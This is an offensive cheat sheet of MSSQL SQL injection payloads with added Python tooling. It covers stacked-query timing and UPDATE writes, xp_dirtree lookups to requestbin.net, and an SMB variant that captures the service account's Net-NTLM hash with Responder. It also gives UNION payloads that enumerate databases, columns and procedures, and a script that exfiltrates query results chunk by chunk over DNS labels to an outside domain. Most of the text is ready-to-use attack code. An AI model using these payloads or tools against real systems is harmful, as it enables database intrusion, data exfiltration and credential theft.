MSSQL

Resources / Pro tips

Not DBA (payloads that do not need sysadmin rights)

Issues

Collation conflict between Latin1_General_CI_AS and SQL_Latin1_General_CP1_CI_AS: a UNION between string columns of different collations fails with "Cannot resolve the collation conflict". Cast the injected column to varbinary, which carries no collation (adding COLLATE DATABASE_DEFAULT to the column is the other option):

convert(varbinary,<column_name>)
Stacked queries? (a measurable delay confirms the second statement ran; the UPDATE then proves the injection point can write)
a'; WAITFOR DELAY '00:00:10' --
a'; UPDATE <table> SET <column_name> = '<value>' WHERE id=<id>; --
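A small timing oracle for the stacked-query check above, as an added example rather than code from the page. `send` is a hypothetical caller-supplied function that delivers the string to the injectable parameter (for instance a wrapper around an HTTP client); `simulated_send` stands in for a real target so the block runs offline. The baseline is the slowest of several harmless requests, so ordinary latency jitter is not mistaken for WAITFOR.

```python
"""Stacked-query detection for MSSQL via WAITFOR DELAY (added example)."""
import re
import time
from typing import Callable


def stacked(*statements: str, prefix: str = "a'") -> str:
    """Close the original literal, append our statements, comment out the rest."""
    return prefix + "; " + "; ".join(statements) + "; -- "


def sql_str(value: str) -> str:
    """Quote a T-SQL string literal: single quotes are doubled, never stripped."""
    return "'" + value.replace("'", "''") + "'"


def waitfor_payload(seconds: int) -> str:
    return stacked(f"WAITFOR DELAY '00:00:{int(seconds):02d}'")


def update_payload(table: str, column: str, value: str, row_id: int) -> str:
    # Page's UPDATE primitive with the value quoted safely for T-SQL.
    return stacked(f"UPDATE {table} SET {column} = {sql_str(value)} WHERE id = {int(row_id)}")


def _timed(send: Callable[[str], object], payload: str) -> float:
    t0 = time.monotonic()
    send(payload)
    return time.monotonic() - t0


def stacked_queries_supported(send: Callable[[str], object], delay: int = 5,
                              samples: int = 2, margin: float = 0.8) -> bool:
    """True when the WAITFOR delay shows up in the response time.

    Baseline requests carry no stacked statement ("a' -- "), so a target that
    rejects stacking errors out quickly on the WAITFOR request and the
    difference stays below `margin` of the requested delay.
    """
    baseline = max(_timed(send, "a' -- ") for _ in range(samples))
    delayed = _timed(send, waitfor_payload(delay))
    return delayed - baseline >= delay * margin


def simulated_send(payload: str) -> None:
    """Offline stand-in for a vulnerable target: honours WAITFOR DELAY only.
    Constructed for this example; a real `send` would perform the request."""
    m = re.search(r"WAITFOR DELAY '00:00:(\d\d)'", payload)
    if m:
        time.sleep(int(m.group(1)))


if __name__ == "__main__":
    print("stacked queries:", stacked_queries_supported(simulated_send, delay=1))
    print(update_payload("users", "password", "p'w", 1))
```

Use a delay long enough to stand out from network jitter on the real target (the page's 10 seconds is a reasonable start) and repeat a positive result once before trusting it.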
Out-of-band DNS request (xp_dirtree)

The share component of the UNC path must be present even if no such share exists, or the lookup does not happen.

http://requestbin.net/dns
Burp Collaborator
a';declare @q varchar(99);set @q='\\<test>.<XXX.d.requestbin.net>\<share>'; exec master.dbo.xp_dirtree @q;-- -

If the lookup works, point the same primitive at an IP you control: the SQL Server service account authenticates to it over SMB, and Responder listening on that host captures its Net-NTLM hash.

a';declare @q varchar(99);set @q='\\<ip>\<anything>'; exec master.dbo.xp_dirtree @q;-- -
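The page's payload only proves that the lookup reaches you. The following added example (not from the page) extends it into a data channel: the query result is hex-encoded on the server with CONVERT style 2, cut into 60-character pieces, and each piece becomes the leftmost DNS label of the UNC host, with a chunk index as the second label so the listener can reassemble them. `xxx.d.requestbin.net`, the IP and the `sql_expr` values are placeholders; the logged query names in the demo are constructed.

```python
"""Leak query results over DNS with xp_dirtree (added example)."""
import binascii

LABEL_MAX = 63   # RFC 1035: a DNS label is at most 63 octets
CHUNK = 60       # hex characters of data per request, keeps the label legal


def hex_expr(sql_expr: str) -> str:
    """T-SQL rendering `sql_expr` as lower-case hex without the 0x prefix
    (CONVERT style 2 on a varbinary)."""
    return f"lower(convert(varchar(max),convert(varbinary(max),({sql_expr})),2))"


def exfil_payload(sql_expr: str, domain: str, chunk_index: int = 0) -> str:
    """Stacked payload: chunk `chunk_index` of the hex result becomes the
    first label of a UNC host that xp_dirtree resolves through DNS."""
    offset = chunk_index * CHUNK + 1            # SUBSTRING is 1-based
    host_tail = f".{chunk_index}.{domain}"
    return ("a';declare @d varchar(max);set @d=" + hex_expr(sql_expr) + ";"
            "declare @q varchar(1024);"
            f"set @q='\\\\'+substring(@d,{offset},{CHUNK})+'{host_tail}\\x';"
            "exec master.dbo.xp_dirtree @q;-- ")


def exfil_payloads(sql_expr: str, domain: str, max_bytes: int):
    """One payload per chunk, enough to cover `max_bytes` of result."""
    chunks = -(-(max_bytes * 2) // CHUNK)      # ceiling division
    return [exfil_payload(sql_expr, domain, i) for i in range(chunks)]


def ntlm_capture_payload(ip: str) -> str:
    """Page's SMB variant: the service account authenticates to our host."""
    return (f"a';declare @q varchar(99);set @q='\\\\{ip}\\x'; "
            "exec master.dbo.xp_dirtree @q;-- ")


def parse_lookup(qname: str, domain: str):
    """Turn a name seen by the DNS listener into (chunk_index, data bytes)."""
    qname = qname.rstrip(".").lower()
    suffix = "." + domain.lower()
    if not qname.endswith(suffix):
        raise ValueError("not our domain")
    labels = qname[: -len(suffix)].split(".")
    if len(labels) != 2:
        raise ValueError("unexpected label layout")
    data_hex, index = labels
    if len(data_hex) > LABEL_MAX or len(data_hex) % 2:
        raise ValueError("malformed data label")
    return int(index), binascii.unhexlify(data_hex)


def reassemble(lookups, domain: str) -> bytes:
    """Order chunks by index and join them. Resolvers retry, so duplicate
    lookups of the same chunk are collapsed by index."""
    parts = {}
    for q in lookups:
        i, data = parse_lookup(q, domain)
        parts[i] = data
    return b"".join(parts[i] for i in sorted(parts))


if __name__ == "__main__":
    for p in exfil_payloads("select top 1 name from master..sysdatabases", "xxx.d.requestbin.net", 64):
        print(p)
    # Constructed listener log: what three lookups for 'master' would look like.
    seen = ["6d61.0.xxx.d.requestbin.net.", "7374.1.xxx.d.requestbin.net.", "6572.2.xxx.d.requestbin.net."]
    print(reassemble(seen, "xxx.d.requestbin.net"))
```

The lookup is performed by the database host's resolver, so it works as long as that host can resolve external names, even when it cannot reach the internet directly; that is why the DNS variant is tried before the SMB one. A chunk past the end of the result yields an empty first label and no usable lookup, which is how you know the data is exhausted.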
List databases (these UNIONs assume the original query returns 8 columns with a datetime in column 4; match the target's real column count and types)
a' union select 1,2,3,getdate(),5,6,convert(varbinary,name),8 FROM master..sysdatabases -- -
List the columns of tables whose name matches a LIKE pattern
a' union select 1,2,3,getdate(),5,6,table_name,column_name FROM information_schema.columns where table_name like '<user>' -- -
List stored procedures
a' union select 1,2,3,getdate(),5,6,convert(varbinary,name),8 FROM master..sysobjects WHERE name like 'sp%' -- -
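The three enumeration payloads above differ only in the FROM clause, and all of them hard-code one column shape. The following added example (not from the page) describes the target query's shape once and generates each UNION from it, keeping the varbinary cast on the leaked column so the UNION never hits the collation conflict from the Issues section. Table and column names are placeholders; the treatment of an nvarchar leak column (re-cast so its bytes come back as UTF-16) is an assumption about how the application renders that column.

```python
"""UNION enumeration helpers for MSSQL injection (added example)."""

# Cheap literals per SQL type that a UNION accepts without conversion errors.
FILLER = {
    "int": "{n}",
    "float": "{n}.0",
    "bit": "0",
    "varchar": "'{n}'",
    "nvarchar": "N'{n}'",
    "datetime": "getdate()",
}


def union_payload(shape, leak_col, leak_expr, from_clause, where=None, prefix="a'"):
    """Build "a' union select <fillers>,<leak>,... FROM ... -- ".

    `shape` lists the SQL type of every column of the original query,
    `leak_col` is the 1-based position the page renders back to us.
    """
    cols = []
    for n, typ in enumerate(shape, start=1):
        if n == leak_col:
            if typ == "nvarchar":
                # Assumption: for an nvarchar column the bytes are read back
                # as UTF-16, so convert to nvarchar before the varbinary cast.
                leak_expr = f"convert(nvarchar(max),{leak_expr})"
            cols.append(f"convert(varbinary,{leak_expr})")
        else:
            cols.append(FILLER[typ].format(n=n))
    sql = f"{prefix} union select {','.join(cols)} FROM {from_clause}"
    if where:
        sql += f" WHERE {where}"
    return sql + " -- "


def list_databases(shape, leak_col):
    return union_payload(shape, leak_col, "name", "master..sysdatabases")


def list_columns(shape, leak_col, table_pattern):
    return union_payload(shape, leak_col, "column_name", "information_schema.columns",
                         f"table_name like '{table_pattern}'")


def list_procedures(shape, leak_col, name_pattern="sp%"):
    return union_payload(shape, leak_col, "name", "master..sysobjects",
                         f"name like '{name_pattern}'")


def decode_leaked(value: str) -> str:
    """Some applications render a varbinary as its 0x hex form; recover the
    text in that case, otherwise the value already is the string."""
    if value.lower().startswith("0x") and len(value) % 2 == 0:
        try:
            return bytes.fromhex(value[2:]).decode("latin-1")
        except ValueError:
            pass
    return value


if __name__ == "__main__":
    shape = ["int", "int", "int", "datetime", "int", "int", "varchar", "int"]
    print(list_databases(shape, 7))
    print(list_columns(shape, 7, "%user%"))
    print(list_procedures(shape, 7))
    print(decode_leaked("0x6D6173746572"))
```

Work out the shape first with the usual ORDER BY / NULL-filler probing, then only the leak column and FROM clause change between requests; a LIKE pattern such as `%user%` is usually more useful than an exact table name.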